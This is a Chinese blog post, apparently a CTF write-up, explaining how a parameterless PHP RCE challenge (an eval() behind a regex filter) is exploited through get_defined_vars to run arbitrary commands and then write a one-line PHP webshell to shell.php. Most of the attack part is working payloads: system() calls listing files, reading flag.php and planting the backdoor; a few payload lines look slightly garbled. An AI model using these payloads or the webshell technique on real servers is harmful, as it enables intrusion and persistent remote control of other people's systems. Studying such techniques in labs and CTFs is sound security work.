IT数码 购物 网址 头条 软件 日历 阅读 图书馆
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
图片批量下载器
↓批量下载图片,美女图库↓
图片自动播放器
↓图片自动播放器↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁
 
   -> PHP知识库 -> 利用无参数的RCE注入写一个一句话木马 -> 正文阅读

[PHP知识库]利用无参数的RCE注入写一个一句话木马

昨天做了一个无参数注入RCE的题,学到后面突然觉得可以做一些有趣的事
然后就尝试做了一下,发现可以利用相关漏洞写一个一句话木马
今天来总结一下

以下是源码

<?php
header("content-type:text/html;charset=utf-8"); 
if(';' === preg_replace('/[a-z,_]+\((?R)?\)/', '', $_GET['code'])) {    
    eval($_GET['code']);
} else {
    echo "error";
}
highlight_file(__FILE__);
?> //2.php

以下是我的目录,可以看到flag.php就在当前目录下
在这里插入图片描述先说说怎么做吧,再重点讲一讲原理
这是我的getshell

val(end(current(get_defined_vars())));&b=system('echo "<?php @eval(_POST[shell]);?>">>shell.php');

这里主要是用了get_defined_vars的特性

首先,下面这玩意儿作用是把$b里面的变量给他eval(),相当于下面的作用是eval(phpinfo())

eval(end(current(get_defined_vars())));&b=phpinfo();

最后的结果如下,很正确吧(关于为啥是这样我也就不说了,网上搜无参数RCE,一大把介绍,我会再文末附上两个我学习的帖子,大火可以参考)
在这里插入图片描述既然b的内容可以直接输出,那么我们让b=system()
那么可操作的空间就变大了

咱们直接来一手b=system(‘dir’),咱们看看效果
在这里插入图片描述直接干出来了目录下的文件

那么思路就清晰了,现在我们只需要b=system(‘type flag.php’)那么flag就出来了(主要要用源码查看,否则有特殊字符不显示)
在这里插入图片描述

但这不是我们讲的重点,如果说flag.php不在当前目录呢,我们也有其他方法去做,但是如果直接写一句话,不就更简单了嘛,

直接再system里面放下面这段,一句话木马直接出来了

echo "<?php @eval(_POST[shell]);?>">>shell.php

在这里插入图片描述
原理特别简单,我也只是学习到了,突然想到了其他方式,特意来记录下来

然后相关无参数绕过的方式下面有俩大佬写的,我觉得很容易懂,写的很好推荐给大家

参考1

参考1该链接的源代码貌似有点儿不好使

  PHP知识库 最新文章
Laravel 下实现 Google 2fa 验证
UUCTF WP
DASCTF10月 web
XAMPP任意命令执行提升权限漏洞(CVE-2020-
[GYCTF2020]Easyphp
iwebsec靶场 代码执行关卡通关笔记
多个线程同步执行,多个线程依次执行,多个
php 没事记录下常用方法 (TP5.1)
php之jwt
2021-09-18
上一篇文章      下一篇文章      查看所有文章
加:2021-10-25 12:21:21  更:2021-10-25 12:21:25 
 
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁

360图书馆 购物 三丰科技 阅读网 日历 万年历 2024年11日历 -2024/11/23 20:16:35-

图片自动播放器
↓图片自动播放器↓
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
图片批量下载器
↓批量下载图片,美女图库↓
  网站联系: qq:121756557 email:121756557@qq.com  IT数码